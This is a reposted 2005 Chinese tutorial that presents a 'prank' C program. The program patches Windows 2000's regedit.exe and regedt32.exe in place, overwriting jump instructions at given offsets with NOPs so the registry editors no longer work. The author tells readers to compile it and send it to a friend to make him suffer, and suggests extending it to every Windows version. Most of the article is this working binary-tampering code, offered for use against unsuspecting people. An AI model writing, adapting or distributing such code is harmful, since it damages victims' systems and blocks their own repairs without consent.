首页 电脑 电脑学堂 查看内容

整蛊之注册表终极操作

2005-4-19 06:56 619 0

摘要: 作者: 风泽[E.S.T]  来源:http://evilhsu.neeao.com/ 你有没有遇到注册表被锁定,无法打开注册表来手工修复呢?HOHO~~很多人都为这个头疼吧,相信你被锁定一次就知道...
关键词: 程序 函数 指令 注册表 exe 偏移 regedit scanreg regedt WINNT

作者: 风泽[E.S.T]  来源:http://evilhsu.neeao.com/ 你有没有遇到注册表被锁定,无法打开注册表来手工修复呢?HOHO~~很多人都为这个头疼吧,相信你被锁定一次就知道他的操作原理了:修改[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System]下的DisableRegistryTools值为1解锁的方法也有几种,比如程序用API函数调用注册表直接删除,做一个REG文件直接导入,写一个脚本…………今天我就教大家写个程序来实现另类锁定,哈哈~~是不是很好奇了?跟我来。实验环境:windows2000实验目的:锁定注册表(本方法利用了Cracker的思路来实现,直接让程序修改程序指令,使调用注册表程序禁止。)实现方法:C程序首先我们要按照Cracker的思路反汇编WINNT下的regedit.exe和regedt32.exe找到跳转指令,怎么得到这些信息不是我们今天的目的,这里我就不详细介绍了,以下是我反汇编找到的跳转地址:1.regedit.exe偏移地址:0x69CA 将指令:0x74 0x1A 修改成:0x90 0x902.regedt32.exe偏移地址:0x10bf2 将指令:0x74 0x52 修改成:0x90 0x90现在我们用程序把这2个偏移地址的指令给修改成0x90 0x90 ( 0x90代表nop,就是让程序什么也不做,执行下一条指令)让我们看看程序是如何实现的吧。#include <stdio.h>#include <string.h> bool scanreg(const char *file,long offset, int length,char *the); /*函数说明*/main(){ char the[]={ 0x90,0x90 }; scanreg("C:\\WINNT\\regedit.exe",0x69CA,0x02,the); /*调用函数修改winnt下的regedit.exe 其中的0x02是修改长度*/scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedit.exe",0x69CA,0x02,the); /*调用函数改变补丁下regedit.exe*/scanreg("C:\\WINNT\\system32\\regedt32.exe",0x10bf2,0x02,the); /*调用函数修改system32下的regedt32.exe */scanreg("C:\\WINNT\\ServicePackFiles\\i386\\regedt32.exe",0x10bf2,0x02,the); /*调用函数改变补丁下regedt32.exe*/}bool scanreg(const char *file,long offset, int length,char *the) { FILE *fp = NULL; bool result=false; if((fp=fopen(file,"rb+"))!=NULL) /*打开文件进行读写操作*/{ fseek(fp,offset,1); /*把指针指向我们定义的偏移地址*/fwrite(the,length,1,fp); /*修改程序,把指令替换成0x90*/fclose(fp); /*关闭文件*/result=true; }return(result); }好了,把程序编译一下发给朋友,让他痛苦一下吧。我这里只是一个示范,只适合2000系统,我们可以把windows每种系统的注册表调用程序都分析一下,然后在程序开始用API函数GetVersionEx(LPOSVERSIONINFO lpVersionInfo)判断系统,根据判断的系统来调用相应的修改函数。HOHO~~那不是通杀windows了?
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系 [邮箱地址] 删除

路过

雷人

握手

鲜花

鸡蛋

最新评论

返回顶部